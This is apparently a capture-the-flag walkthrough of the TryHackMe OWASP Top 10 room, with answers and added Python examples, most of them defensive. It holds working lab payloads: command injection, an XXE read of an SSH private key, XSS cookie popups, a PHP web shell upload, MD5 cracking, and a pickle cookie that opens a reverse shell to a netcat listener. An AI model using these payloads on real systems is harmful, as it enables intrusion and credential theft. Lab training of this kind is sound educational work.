- Tools
- Introduction
- Accessing machines
- [Severity 1] Injection
- [Severity 1] OS Command Injection
- [Severity 1] Command Injection Practical
- [Severity 2] Broken Authentication
- [Severity 2] Broken Authentication Practical
- [Severity 3] Sensitive Data Exposure (Introduction)
- [Severity 3] Sensitive Data Exposure (Supporting Material 1)
- [Severity 3] Sensitive Data Exposure (Supporting Material 2)
- [Severity 3] Sensitive Data Exposure (Challenge)
- [Severity 4] XML External Entity
- [Severity 4] XML External Entity - eXtensible Markup Language
- [Severity 4] XML External Entity - DTD
- [Severity 4] XML External Entity - XXE Payload
- [Severity 4] XML External Entity - Exploiting
- [Severity 5] Broken Access Control
- [Severity 5] Broken Access Control (IDOR Challenge)
- [Severity 6] Security Misconfiguration
- [Severity 7] Cross-site Scripting
- [Severity 8] Insecure Deserialization
- [Severity 8] Insecure Deserialization - Objects
- [Severity 8] Insecure Deserialization - Deserialization
- [Severity 8] Insecure Deserialization - Cookies
- [Severity 8] Insecure Deserialization - Cookies Practical
- [Severity 8] Insecure Deserialization - Code Execution
- [Severity 9] Components With Known Vulnerabilities - Intro
- [Severity 9] Components With Known Vulnerabilities - Exploit
- [Severity 9] Components With Known Vulnerabilities - Lab
- [Severity 10] Insufficient Logging and Monitoring
- What Next?
Room Link: https://tryhackme.com/r/room/owasptop10
OWASP TOP 10
Badges: https://tryhackme.com/ZishanAdThandar/badges/owasp-10
- sqlite3
- CrackStation (https://crackstation.net)
- Browser Debugging Tools (CTRL+SHIFT+I)
- Browser Source Code Viewer (CTRL+U)
- Join the machine
- Read Instructions and click on Complete.
- Go to Access and download the .ovpn file to connect: https://tryhackme.com/access
- Or, Start attackbox for testing.
- Read this section carefully and click on Complete.
- Read this section and the linked article, then click on Complete.
- Start the machine and get the target IP from "Target Machine Information". Then open http://machine_ip/evilshell.php
- Type commands into the form and submit; the output appears below it.
- Question: What strange text file is in the website root directory?
  Answer: `drpepper.txt`. Running `ls` shows this file.
- Question: How many non-root/non-service/non-daemon users are there?
  Answer: `0`. `cat /etc/passwd` lists the accounts; regular users would have a UID of 1000 or higher and an interactive shell, and there are none here.
- Question: What user is this app running as?
  Answer: `www-data`. Command used: `whoami`.
- Question: What is the user's shell set as?
  Answer: `/usr/sbin/nologin`. Command used: `getent passwd www-data` or `cat /etc/passwd | grep www-data`.
- Question: What version of Ubuntu is running?
  Answer: (not recorded in this writeup). Command used: `lsb_release -a`.
- Question: Print out the MOTD. What favorite beverage is shown?
  Answer: `DR PEPPER`. Command used: `cat /etc/update-motd.d/00-header`.
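The "non-root/non-service/non-daemon users" question is answered by reading `/etc/passwd` with the right filter rather than by eye. The following is an added example (not part of the room or this writeup) that applies that filter to a constructed passwd file; the `falcon` entry is included so the filter has a human account to find, and the UID and shell conventions assumed are the Debian/Ubuntu ones.

```python
"""Classify /etc/passwd entries: which accounts are real users, and what shell an
account such as www-data has. Standard library only."""

# Constructed sample in /etc/passwd format (not the room's actual file); the
# 'falcon' entry is included so the filter has a human account to find.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
falcon:x:1000:1000:Falcon,,,:/home/falcon:/bin/bash
"""

# Shells that mark an account as non-interactive (service/daemon accounts).
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}


def parse_passwd(text):
    """Yield (name, uid, shell) for every well-formed 7-field passwd line."""
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue  # skip comments, blanks and malformed lines instead of crashing
        name, _pw, uid, _gid, _gecos, _home, shell = fields
        yield name, int(uid), shell


def human_users(text, min_uid=1000, nobody_uid=65534):
    """Accounts that are neither root nor service/daemon accounts: on Debian and
    Ubuntu, regular users get UIDs from 1000 upward and an interactive shell."""
    return [
        name
        for name, uid, shell in parse_passwd(text)
        if uid >= min_uid and uid != nobody_uid and shell not in NON_LOGIN_SHELLS
    ]


def shell_of(text, user):
    """Login shell of one account, or None if the account does not exist."""
    for name, _uid, shell in parse_passwd(text):
        if name == user:
            return shell
    return None


if __name__ == "__main__":
    print(human_users(SAMPLE_PASSWD))
    print(shell_of(SAMPLE_PASSWD, "www-data"))
```

Run against the real file on the target, `human_users` returns an empty list (the room's answer of 0) and `shell_of(..., "www-data")` returns `/usr/sbin/nologin`.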
- Read this section carefully and click on Complete.
- If any machine is running, terminate it first. Then start this machine, copy the target IP from "Target Machine Information" and open http://MACHINE_IP:8888
- Question: What is the flag that you found in darren's account?
  Answer: `fe860794************74b667`. Register a new account with the username " darren" (a space before the name) and log in with it. Registration does not normalise the username, so " darren" is accepted as a new account, but the application then treats it as darren's and shows darren's flag.
- Test the same trick with the user `arthur` and click on Complete.
- Question: What is the flag that you found in arthur's account?
  Answer: `d9ac0f7************75e16e`.
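The " darren" bypass works because the uniqueness check at registration compares the raw string while the rest of the application resolves the name to the existing account. The following is an added example (not code from the room or this writeup) of the check that closes that gap: canonicalise the username once and use the same form on both the registration and login paths. The `UserStore` class and the NFKC/casefold policy are this example's own choices.

```python
"""Why ' darren' worked: the registration check compared the raw string, so a name
with a leading space was 'new', while the rest of the application resolved it to the
existing darren account. Canonicalising the username before the uniqueness check
closes that gap. Standard library only."""
import unicodedata


class RegistrationError(ValueError):
    """Raised when a username is empty, malformed or collides with an existing one."""


def canonical_username(raw):
    """Return the form of the name that is compared and stored.

    NFKC folds look-alike code points (fullwidth letters, composed characters),
    strip() removes the leading/trailing whitespace the room's bypass relied on,
    and casefold() makes 'Darren' and 'darren' the same account.
    """
    name = unicodedata.normalize("NFKC", raw).strip().casefold()
    if not name or any(ch.isspace() for ch in name):
        raise RegistrationError("username must be a single non-empty token")
    return name


class UserStore:
    """Minimal in-memory account table keyed by the canonical name."""

    def __init__(self):
        self._users = {}  # canonical name -> name as originally typed

    def register(self, username):
        key = canonical_username(username)
        if key in self._users:
            raise RegistrationError(
                f"{username!r} collides with existing account {self._users[key]!r}"
            )
        self._users[key] = username
        return key

    def lookup(self, username):
        """Login-side lookup uses the same canonical form, so both paths agree."""
        return self._users.get(canonical_username(username))


def attempt_registrations(names):
    """Register each name in turn; report 'created' or 'rejected' per name."""
    store = UserStore()
    outcomes = {}
    for name in names:
        try:
            store.register(name)
            outcomes[name] = "created"
        except RegistrationError:
            outcomes[name] = "rejected"
    return outcomes


if __name__ == "__main__":
    print(attempt_registrations(["darren", " darren", "Darren", "\uff44arren", "arthur"]))
```

The fullwidth "ｄarren" case is included because whitespace is only the simplest of the look-alike tricks; any difference between how the registration check and the rest of the application interpret a name is exploitable in the same way.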
- If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from "Target Machine Information".
- Read this section carefully and click on Complete.
- Read this section carefully and click on Complete.
- Read this section carefully and click on Complete.
- If we open the machine link and view the page source, we find an image link to http://machine_ip/assets/images/lake-taupo.jpg
- Navigating to the http://machine_ip/assets directory shows a directory listing that includes a sensitive database file named `webapp.db`.
- Question: What is the name of the mentioned directory?
  Answer: `/assets`
- Question: Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?
  Answer: `webapp.db`. It is a file inside `/assets`.
- Download the file; `file webapp.db` identifies it as an SQLite 3 database, so we can open it with `sqlite3 webapp.db`.
- The `.tables` command lists two tables, `sessions` and `users`, and `PRAGMA table_info(users);` lists the columns of `users`:

```
$> sqlite3 webapp.db
SQLite version 3.37.2 2022-01-06 13:25:41
Enter ".help" for usage hints.
sqlite> .tables
sessions  users
sqlite> PRAGMA table_info(users);
0|userID|TEXT|1||1
1|username|TEXT|1||0
2|password|TEXT|1||0
3|admin|INT|1||0
sqlite>
```

- `select * from users;` dumps the rows, including the admin hash `6eea9b7ef191*******0f6c05ceb`:

```
sqlite> select * from users;
4413096d9c933359b898b6202288a650|admin|6eea9b7ef191******f6c05ceb|1
23023b67a32488588db1e28579ced7ec|Bob|ad0234829205b9033196ba818f7a872b|1
4e8423b514eef575394ff78caed3254d|Alice|268b38ca7b84f44fa0a6cdc86e6301e0|0
sqlite>
```

- Question: Use the supporting material to access the sensitive data. What is the password hash of the admin user?
  Answer: `6eea9b7ef191*****dd0f6c05ceb`
- Question: What is the admin's plaintext password?
  Answer: `qwe****op`. The hash is an unsalted 32-character hex digest, the shape of MD5, and CrackStation returns the plaintext from its lookup tables.
- Question: Login as the admin. What is the flag?
  Answer: `THM{Yzc2Yjd*************diMjdl}`. Go to `http://machine_ip/login` and log in with username `admin` and the cracked password `qw*****iop`; the site redirects to `http://machine_ip/console/`, where the flag is shown.
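The steps above (enumerate tables and columns, pull the admin hash, identify it, crack it) can be reproduced offline. The following is an added example, not code from the room or this writeup: it builds an in-memory SQLite database with the same two tables and column layout as `webapp.db`, with constructed rows whose MD5 hashes are computed in the script so the expected results are known, and runs a small dictionary attack in place of CrackStation's lookup. The wordlist and plaintexts are this example's own.

```python
"""Offline re-creation of the webapp.db analysis: list tables and columns, pull the
hashes of admin accounts, triage the hash type and run a dictionary attack (what
CrackStation does against its precomputed tables). Standard library only."""
import hashlib
import sqlite3

# Constructed rows, not the room's data. The schema mirrors the PRAGMA table_info
# output above: userID TEXT, username TEXT, password TEXT, admin INT. Passwords
# are hashed here so the expected results are known.
SAMPLE_ROWS = [
    ("4413096d9c933359b898b6202288a650", "admin", hashlib.md5(b"hunter2").hexdigest(), 1),
    ("23023b67a32488588db1e28579ced7ec", "Bob", hashlib.md5(b"letmein").hexdigest(), 1),
    ("4e8423b514eef575394ff78caed3254d", "Alice", hashlib.md5(b"Tr0ub4dor&3").hexdigest(), 0),
]
# A deliberately tiny wordlist; CrackStation's tables hold billions of entries.
WORDLIST = ["123456", "password", "qwerty", "hunter2", "letmein", "bob"]


def build_sample_db():
    """In-memory SQLite database with the same two tables as webapp.db."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (userID TEXT NOT NULL PRIMARY KEY, username TEXT NOT NULL, "
        "password TEXT NOT NULL, admin INT NOT NULL)"
    )
    con.execute("CREATE TABLE sessions (sessionID TEXT, userID TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return con


def schema(con):
    """table -> column names; the same information as .tables plus PRAGMA table_info."""
    tables = [r[0] for r in con.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name")]
    return {t: [col[1] for col in con.execute(f'PRAGMA table_info("{t}")')] for t in tables}


def admin_hashes(con):
    """username -> stored hash for every account flagged admin = 1."""
    return dict(con.execute("SELECT username, password FROM users WHERE admin = 1"))


def guess_hash_type(digest):
    """Length-based triage of an unsalted hex digest (32 hex chars is the MD5 shape)."""
    if not digest or any(c not in "0123456789abcdef" for c in digest.lower()):
        return "not a hex digest"
    return {32: "MD5", 40: "SHA-1", 64: "SHA-256"}.get(len(digest), "unknown")


def crack(digest, wordlist, algo="md5"):
    """Dictionary attack: hash each candidate and compare; plaintext or None."""
    digest = digest.lower()
    for word in wordlist:
        if hashlib.new(algo, word.encode()).hexdigest() == digest:
            return word
    return None


if __name__ == "__main__":
    con = build_sample_db()
    print(schema(con))
    for user, h in admin_hashes(con).items():
        print(user, guess_hash_type(h), crack(h, WORDLIST))
```

Alice's hash is not in the wordlist, so `crack` returns `None` for it; that is the same outcome CrackStation gives for a password outside its tables, which is why an unsalted fast hash is the finding here regardless of whether a given row cracks.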
- If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from "Target Machine Information".
- Read this section carefully and click on Complete.
- Read this section carefully and then start answering.
- Question: Full form of XML
  Answer: eXtensible Markup Language
- Question: Is it compulsory to have XML prolog in XML documents?
  Answer: No
- Question: Can we validate XML documents against a schema?
  Answer: Yes
- Question: How can we specify XML version and encoding in XML document?
  Answer: XML prolog
- Question: How do you define a new ELEMENT?
  Answer: !ELEMENT
- Question: How do you define a ROOT element?
  Answer: !DOCTYPE
- Question: How do you define a new ENTITY?
  Answer: !ENTITY
- Read this section carefully and click on Complete.
- Now open http://machine_ip
- Use the payload given in the previous section to print `falcon feast`, then click on Complete.
- Use the payload from the previous section again to read `/etc/passwd`, then click on Complete.
- Question: What is the name of the user in /etc/passwd
  Answer: `falcon`. It appears in the output of the previous payload.
- The same payload reads any file the web server's user can read: replace `/etc/passwd` with the SSH key location `/home/falcon/.ssh/id_rsa`.
- Question: Where is falcon's SSH key located?
  Answer: `/home/falcon/.ssh/id_rsa`
- Payload to read the SSH key:

```xml
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM '/home/falcon/.ssh/id_rsa'>]>
<root>&read;</root>
```

- Question: What are the first 18 characters for falcon's private key
  Answer: `MIIEogI****CAQEA7b`
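The payload works because the server's XML parser resolves the `SYSTEM` entity and substitutes the file's contents for `&read;`. The following is an added example, not code from the room (whose server is not Python) or from this writeup: it feeds the same payload shape to Python's standard-library SAX parser twice, once with external general entities enabled (the vulnerable configuration) and once with the default, hardened setting, and reads a temporary file created by the example in place of `/home/falcon/.ssh/id_rsa`.

```python
"""The XXE mechanism behind the payloads above: a SAX parser that honours
<!ENTITY ... SYSTEM> reads whatever file the web server's user can read, while the
same parser with external general entities disabled returns nothing for &read;.
Standard library only; the 'SSH key' is a temporary file created by the example."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collect the character data of the document, i.e. what the page echoes back."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    def text(self):
        return "".join(self.chunks)


def xxe_payload(path):
    """Same shape as the room's payload, parameterised by the file to read."""
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE root [<!ENTITY read SYSTEM '{path}'>]>\n"
        "<root>&read;</root>"
    )


def parse(xml_bytes, resolve_external_entities):
    """Parse the document; the flag is the one setting that makes XXE possible."""
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    # Off by default in Python since 3.7.1; an application that turns it on (or uses
    # a parser that resolves SYSTEM entities by default) is the vulnerable server.
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def demo():
    """Return (what the vulnerable parser leaks, what the hardened parser returns)."""
    # Constructed stand-in for /home/falcon/.ssh/id_rsa, so the example runs anywhere.
    with tempfile.NamedTemporaryFile("w", suffix=".key", delete=False) as f:
        f.write("-----BEGIN FAKE KEY-----\nnotarealkey\n-----END FAKE KEY-----\n")
        target = f.name
    try:
        doc = xxe_payload(target).encode()
        leaked = parse(doc, resolve_external_entities=True)
        blocked = parse(doc, resolve_external_entities=False)
    finally:
        os.remove(target)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable parser:", repr(leaked))
    print("hardened parser:  ", repr(blocked))
```

The fix on the server side is the second configuration: a parser that does not resolve external entities (and rejects or ignores the `DOCTYPE` altogether where the application has no need for one). Note that `SYSTEM` also accepts URLs, so the same flag turns the parser into an SSRF primitive, which is why a single "disable external entities" switch is the right control rather than a file-path blacklist.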
- Read this section carefully and click on Complete.
- If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from "Target Machine Information".
- Read and understand how IDOR works and click on Complete.
- Open http://machine_ip/ and log in with username `note` and password `test123`, then click on Complete.
- Question: Look at other users notes. What is the flag?
  Answer: `flag{fivef***three}`. The note ID is passed as a URL parameter with no check that the note belongs to the logged-in user: changing it to 0 and visiting `http://machine_ip/note.php?note=0` returns another user's note.
- If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from "Target Machine Information".
- Read this section carefully, deploy the vm and click on Complete.
- Opening http://machine_ip shows a web app named Pensive Notes. Searching for it leads to its GitHub repository, https://github.com/NinjaJc01/PensiveNotes, which documents the default credentials `pensive:PensiveNotes`; they still work on the target.
- Question: Hack into the webapp, and find the flag!
  Answer: `thm{4b95139*******a1f9d672e17}`
- If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from "Target Machine Information".
- Read this section carefully, deploy the vm and click on Complete.
- Question: Navigate to http://machine_ip in your browser and click on the "Reflected XSS" tab on the navbar; craft a reflected XSS payload that will cause a popup saying "Hello".
  Answer: `ThereIsMoreToXSSThanYouThink`. Payload used: `<script>alert("Hello")</script>`; PoC link: http://machine_ip/reflected?keyword=%3Cscript%3Ealert(%22Hello%22)%3C/script%3E
- Question: On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.
  Answer: `ReflectiveXss4TheWin`. Payload used: `<script>alert(window.location.hostname)</script>`; PoC link: http://machine_ip/reflected?keyword=%3Cscript%3Ealert(window.location.hostname)%3C/script%3E
- Now go to http://machine_ip/stored and create an account.
- Question: Then add a comment and see if you can insert some of your own HTML.
  Answer: `HTML_T4gs`. Posted `<img>` as a comment on http://machine_ip/stored.
- Question: On the same page, create an alert popup box appear on the page with your document cookies.
  Answer: `W3LL_D0N3_LVL2`. Payload used: `<script>alert(document.cookie)</script>`
- Question: Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript.
  Answer: `websites_can_be_easily_defaced_with_xss`. Payload used: `<script>document.querySelector("#thm-title").textContent="I am a hacker"</script>`
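All three payloads above land for the same reason: the keyword or comment is written into the HTML response exactly as submitted. The following is an added example, not the room's application code (which is not shown), written in Python as the rest of the added examples on this page are: it renders the same payloads the vulnerable way and with output encoding for an HTML text context, and builds the PoC links with standard URL encoding. The `render_*` functions stand in for the room's templates.

```python
"""Reflected XSS from the server's side: the same keyword echoed into the response
body with and without HTML escaping, plus the URL encoding used to build the PoC
links above. Standard library only."""
import html
from urllib.parse import urlencode

# The payloads used in this task.
PAYLOADS = {
    "hello": '<script>alert("Hello")</script>',
    "cookies": "<script>alert(document.cookie)</script>",
    "deface": '<script>document.querySelector("#thm-title").textContent="I am a hacker"</script>',
}


def render_unsafe(keyword):
    """The vulnerable pattern: untrusted input concatenated straight into HTML."""
    return f"<p>You searched for: {keyword}</p>"


def render_safe(keyword):
    """Output encoding for an HTML text context: <, >, &, quotes become entities."""
    return f"<p>You searched for: {html.escape(keyword, quote=True)}</p>"


def script_survives(fragment):
    """Oracle: is there still a live <script> tag in the markup?"""
    return "<script" in fragment.lower()


def poc_url(base, keyword):
    """Build the reflected-XSS PoC link the way the writeup's links are built."""
    return f"{base}/reflected?" + urlencode({"keyword": keyword})


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(name, "->", poc_url("http://machine_ip", payload))
        print("  unsafe:", render_unsafe(payload))
        print("  safe:  ", render_safe(payload))
```

Escaping is context-specific: `html.escape` is correct for text between tags and for quoted attribute values, but input placed inside a `<script>` block, a URL, or an event-handler attribute needs that context's encoding instead, and the stored variant on `/stored` needs the same treatment at render time, not at save time.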
- If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from "Target Machine Information".
- Read this section carefully.
- Question: Who developed the Tomcat application?
  Answer: The Apache Software Foundation
- Question: What type of attack that crashes services can be performed with insecure deserialization?
  Answer: Denial of Service
- Read this section.
- Question: if a dog was sleeping, would this be: A) A State B) A Behaviour
  Answer: A Behaviour
- Read this section.
- Question: What is the name of the base-2 formatting that data is sent across a network as?
  Answer: binary
- Read this section carefully.
- Question: If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?
  Answer: webapp.com/login/
- Question: What is the acronym for the web technology that Secure cookies work over?
  Answer: HTTPS
- Open http://machine_ip/register, create an account and log in.
- Press CTRL+SHIFT+I and go to the Storage tab to read and edit cookies.
- Copy the value of the `sessionId` cookie and base64-decode it:
  `echo "gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAN2Y1MWRiYWFhZjY2NDYwMzkyNTNiNTlkOTY3NTAwYWVxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==" | base64 -d`
  The decoded bytes are a Python pickle (the `\x80\x03` prefix) of a dictionary, and the first flag is readable in it as plain text.
- Question: 1st flag (cookie value)
  Answer: `THM{good******se64_huh}`
- Edit the `userType` cookie value from `user` to `admin` and reload the page; it redirects to the admin page, which shows the flag. The server trusts the client-supplied role with no signature or server-side check.
- Question: 2nd flag (admin dashboard)
  Answer: `THM{heres******in_flag}`
- Start a listener with `nc -lvp 4444`.
- Change the `userType` cookie value back from `admin` to `user`. Open `http://machine_ip/myprofile`, click `Exchange on vim` and then `feedback`, and submit some feedback.
- Follow the instructions carefully: download `pickleme.py` and replace "YOUR_TRYHACKME_VPN_IP" with your TryHackMe VPN IP, which you can get with `ifconfig tun0 | grep destination | cut -d" " -f10` (or `ip -4 addr show tun0`). Run the script with `python3 pickleme.py`, copy the printed cookie value and add a cookie named `encodedPayload` with that value. Reload the feedback page: the server unpickles the payload and a shell arrives on the netcat listener. Read the flag with `cat ../flag.txt`.
- Question: flag.txt
  Answer: `4a69a7***fd68`
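Both flags and the shell come from the same root cause: the server base64-decodes a cookie and hands the bytes to `pickle.loads`, so the client controls what gets called. The following is an added example, not `pickleme.py` and not code from the room or this writeup: a gadget of the same shape with a harmless recorder in place of the reverse shell, a triage step that lists the globals a pickle would import without running it, an unpickler that refuses to import anything (enough for plain session data), and the HMAC signing that would have caught the `userType=admin` edit. The function and class names, the cookie layout and the key are this example's own.

```python
"""What the cookies in this task rely on: a base64-wrapped pickle that the server
unpickles blindly. Shows the gadget shape (a harmless recorder instead of the room's
reverse shell), a triage step that lists the globals a pickle would import without
running it, an allow-nothing unpickler, and the HMAC signing that would have caught
the userType=admin edit. Standard library only."""
import base64
import hashlib
import hmac
import io
import pickle
import pickletools

EXECUTED = []  # side channel proving that unpickling ran our code


def record(msg):
    """Stand-in for os.system('nc ...'): called by pickle.loads, not by us."""
    EXECUTED.append(msg)
    return msg


class Gadget:
    """Any instance serialises to 'call record(msg)'; that is the whole exploit."""

    def __reduce__(self):
        return (record, ("code ran during pickle.loads",))


def make_cookie(obj):
    """Serialise the way the room's server does: pickle, then base64."""
    return base64.b64encode(pickle.dumps(obj, protocol=3)).decode()


def load_cookie_unsafe(cookie):
    """The server's bug: pickle.loads on client-controlled bytes."""
    return pickle.loads(base64.b64decode(cookie))


def referenced_globals(cookie):
    """module.name pairs the pickle would import, found with pickletools (no execution)."""
    data = base64.b64decode(cookie)
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
        elif op.name == "GLOBAL":            # protocol <= 3: arg is "module name"
            found.append(arg.replace(" ", "."))
        elif op.name == "STACK_GLOBAL":      # protocol >= 4: module and name precede it
            found.append(f"{strings[-2]}.{strings[-1]}")
    return found


class NoGlobalsUnpickler(pickle.Unpickler):
    """Accepts plain data (dict, list, str, int); refuses to import anything."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def load_cookie_restricted(cookie):
    """('ok', value) for plain data; ('rejected', reason) for anything with a global."""
    try:
        return "ok", NoGlobalsUnpickler(io.BytesIO(base64.b64decode(cookie))).load()
    except pickle.UnpicklingError as exc:
        return "rejected", str(exc)


def sign(value, key):
    """value.hexmac: the client can read userType but cannot change it undetected."""
    mac = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{mac}"


def verify(signed, key):
    """Return the value if the MAC is valid, else None."""
    value, _, mac = signed.rpartition(".")
    expected = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(mac, expected) else None


if __name__ == "__main__":
    evil = make_cookie(Gadget())
    print("globals referenced:", referenced_globals(evil))
    print("restricted loader:", load_cookie_restricted(evil))
    print("unsafe loader:", load_cookie_unsafe(evil), EXECUTED)
```

`referenced_globals` is the triage to run on a suspicious cookie before anything else: a session token has no business importing `posix.system` or `subprocess.Popen`. The durable fix is not a cleverer unpickler but not using pickle for data that crosses a trust boundary at all; JSON plus the signature shown in `sign`/`verify` gives the same session functionality with no code-execution surface.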
- Read Instructions and click on Complete.
- Read Instructions and click on Complete.
- If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from "Target Machine Information".
- Opening http://machine_ip shows a link to `http://machine_ip/admin.php` and a link to projectworlds.in. Searching projectworlds.in for the bookstore leads to https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ , which lists the default credentials (username: [email protected], password: admin; the e-mail address did not survive in this writeup, the linked page lists it).
- After logging into the admin panel, we can upload a PHP shell by editing any book. Shell code in `shell.php`:

```php
<?php system('wc -c /etc/passwd'); ?>
```

  On the edit-book page, upload `shell.php` with the `change` button.
- Uploaded images are served from the `/bootstrap/img` directory, so the shell is at `http://machine_ip/bootstrap/img/shell.php`. Requesting it makes the server execute the PHP and print the character count of `/etc/passwd`.
- Question: How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)
  Answer: `1611`
- Read this section carefully.
- Question: What IP address is the attacker using?
  Answer: `49.99.13.16`. The log shows a long run of 401 Unauthorized responses from this IP.
- Question: What kind of attack is being carried out?
  Answer: Brute force. The same source cycles through many usernames, all of them rejected.
- Just click Complete. Done!
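The two answers in the logging task are what an alert rule should produce automatically: a source with many failed logins, and a verdict based on whether those failures spread across many usernames. The following is an added example, not code from the room or this writeup; the log lines are constructed in the layout of the room's sample (status, source IP, username, path, timestamp) rather than copied from it, and the thresholds are this example's own.

```python
"""Detection logic for the log in this task: count 401 Unauthorized responses per
source IP and the distinct usernames tried, then label sources that look like
password guessing or username enumeration. Standard library only."""
from collections import defaultdict

# Constructed lines in the room's log layout, not the room's actual log.
SAMPLE_LOG = """\
200 OK           12.55.22.88 jr22          /login 2019-03-18T09:21:17
200 OK           14.56.23.11 rand99        /login 2019-03-18T09:21:44
401 Unauthorized 49.99.13.16 admin         /login 2019-03-18T09:21:47
401 Unauthorized 49.99.13.16 administrator /login 2019-03-18T09:21:48
401 Unauthorized 49.99.13.16 anonymous     /login 2019-03-18T09:21:49
401 Unauthorized 49.99.13.16 root          /login 2019-03-18T09:21:50
401 Unauthorized 49.99.13.16 guest         /login 2019-03-18T09:21:51
401 Unauthorized 12.55.22.88 jr22          /login 2019-03-18T09:22:03
"""


def parse_line(line):
    """Split one log line into fields; None for blank or malformed lines."""
    parts = line.split()
    if len(parts) < 6 or not parts[0].isdigit():
        return None
    # parts[1] is the status text ("OK" / "Unauthorized"), which we do not need.
    return {"status": int(parts[0]), "ip": parts[2], "user": parts[3],
            "path": parts[4], "ts": parts[5]}


def failed_logins_by_ip(log_text):
    """ip -> {'failures': n, 'usernames': {...}} over 401s against /login."""
    stats = defaultdict(lambda: {"failures": 0, "usernames": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == 401 and rec["path"] == "/login":
            stats[rec["ip"]]["failures"] += 1
            stats[rec["ip"]]["usernames"].add(rec["user"])
    return dict(stats)


def flag_bruteforce(log_text, min_failures=5, min_users=3):
    """ip -> verdict. Many failures spread over many names is username guessing
    (or spraying); many failures against one name is classic password guessing;
    a single failed login is noise and is not flagged."""
    verdicts = {}
    for ip, s in failed_logins_by_ip(log_text).items():
        if s["failures"] < min_failures:
            continue
        if len(s["usernames"]) >= min_users:
            verdicts[ip] = "brute force: username guessing"
        else:
            verdicts[ip] = "brute force: password guessing"
    return verdicts


if __name__ == "__main__":
    for ip, verdict in flag_bruteforce(SAMPLE_LOG).items():
        print(ip, verdict, sorted(failed_logins_by_ip(SAMPLE_LOG)[ip]["usernames"]))
```

The single 401 from `12.55.22.88` is the reason for a threshold: one mistyped password is not an incident, and a rule that fires on it trains the on-call to ignore the alert. The room's point about logging is that without the username and source IP on each line, neither question above could be answered at all.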
Author: Zishan Ahamed Thandar